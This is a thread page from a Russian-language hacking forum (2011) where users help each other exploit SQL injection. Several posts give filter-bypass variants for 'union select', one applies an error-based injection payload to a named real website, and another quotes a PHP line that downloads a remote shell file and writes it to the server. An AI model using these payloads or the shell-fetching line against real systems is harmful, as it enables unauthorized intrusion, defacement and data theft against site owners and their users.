HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18521  
Старый 07.11.2011, 17:16
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от crackforme  
crackforme said:
кто нибудь знает онлайновый кодер из str скажем в char
например
asd = CHAR(97,115,100)
мне надо в binary или нех вида
0x123834756
http://x3k.ru/
 
Ответить с цитированием

  #18522  
Старый 07.11.2011, 17:22
crackforme
Guest
Сообщений: n/a
Провел на форуме:
43818

Репутация: 0
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
http://x3k.ru/
спасибо а можно ли обойти фильтрацию слов union+select+

видом +0x556e696f6e+0x53654c656374+

скобки тоже фильтруются

если нет то как по другому?

Точнее фильтруется Union
 
Ответить с цитированием

  #18523  
Старый 07.11.2011, 17:24
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от crackforme  
crackforme said:
спасибо а можно ли обойти фильтрацию слов union+select+
видом +0x556e696f6e+0x53654c656374+
скобки тоже фильтруются
если нет то как по другому?
/*!union*/+/*!select*/

union%0aselect

/*!UnIoN+SeLeCt*/

UnIoN/**/SeLeCt

%75%6e%69%6f%6e%2b%73%65%6c%65%63%74

asdunionasdselectasd

%75%6e%69%6f%6e%0a%73%65%6c%65%63%74
 
Ответить с цитированием

  #18524  
Старый 07.11.2011, 17:39
crackforme
Guest
Сообщений: n/a
Провел на форуме:
43818

Репутация: 0
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
/*!union*/+/*!select*/
union%0aselect
/*!UnIoN+SeLeCt*/
UnIoN/**/SeLeCt
%75%6e%69%6f%6e%2b%73%65%6c%65%63%74
asdunionasdselectasd
%75%6e%69%6f%6e%0a%73%65%6c%65%63%74
спасибо

union%0aselect
 
Ответить с цитированием

  #18525  
Старый 07.11.2011, 17:51
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от crackforme  
crackforme said:
спасибо
union%0aselect
union%09select

union/**/select

id=(5)union(select(1),(2))
 
Ответить с цитированием

  #18526  
Старый 08.11.2011, 02:35
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
По умолчанию

Вроде бы sql inj есть, но не получается раскрутить(

Цитата:
Сообщение от None  
http://la2.war-top.ru/index.php?do=sitedetails&id=186'
 
Ответить с цитированием

  #18527  
Старый 08.11.2011, 02:59
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Boolean  
Boolean said:
file_put_contents('yashell.php', file_get_contents('http://ya.ru/shell
.txt
'));
Это если url_fopen еще разрешен.
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]regexp code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) : eval()[/COLOR][COLOR="#DD0000"]'d code on line 1[/COLOR][/COLOR] 
пишет ошибку вероятно из за кавычек как мне это убрать?
 
Ответить с цитированием

  #18528  
Старый 08.11.2011, 03:04
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
По умолчанию

Помогите пожалуйста

Ошибка вверху сливается с темным фоном

Цитата:
Сообщение от None  
http://la2-shop.ru/categories.php?id_cat=2'
 
Ответить с цитированием

  #18529  
Старый 08.11.2011, 03:13
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от DJ  
[akep"]
DJ ][akep said:
Помогите пожалуйста
Ошибка вверху сливается с темным фоном
http://la2.war-top.ru/index.php?do=sitedetails&id=186' or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -

а дальше сам.

хинт: error based.
 
Ответить с цитированием

  #18530  
Старый 08.11.2011, 03:17
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
Сообщение от satana8920  
satana8920 said:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]regexp code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) : eval()[/COLOR][COLOR="#DD0000"]'d code on line 1[/COLOR][/COLOR] 
пишет ошибку вероятно из за кавычек как мне это убрать?
Зачем $_GET юзаете? =/

Другой масив используйте, или накрайняк $_REQUEST уж так надо $_GET оставить.

_https://rdot.org/forum/showthread.php?t=118

2-пост
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT.XYZ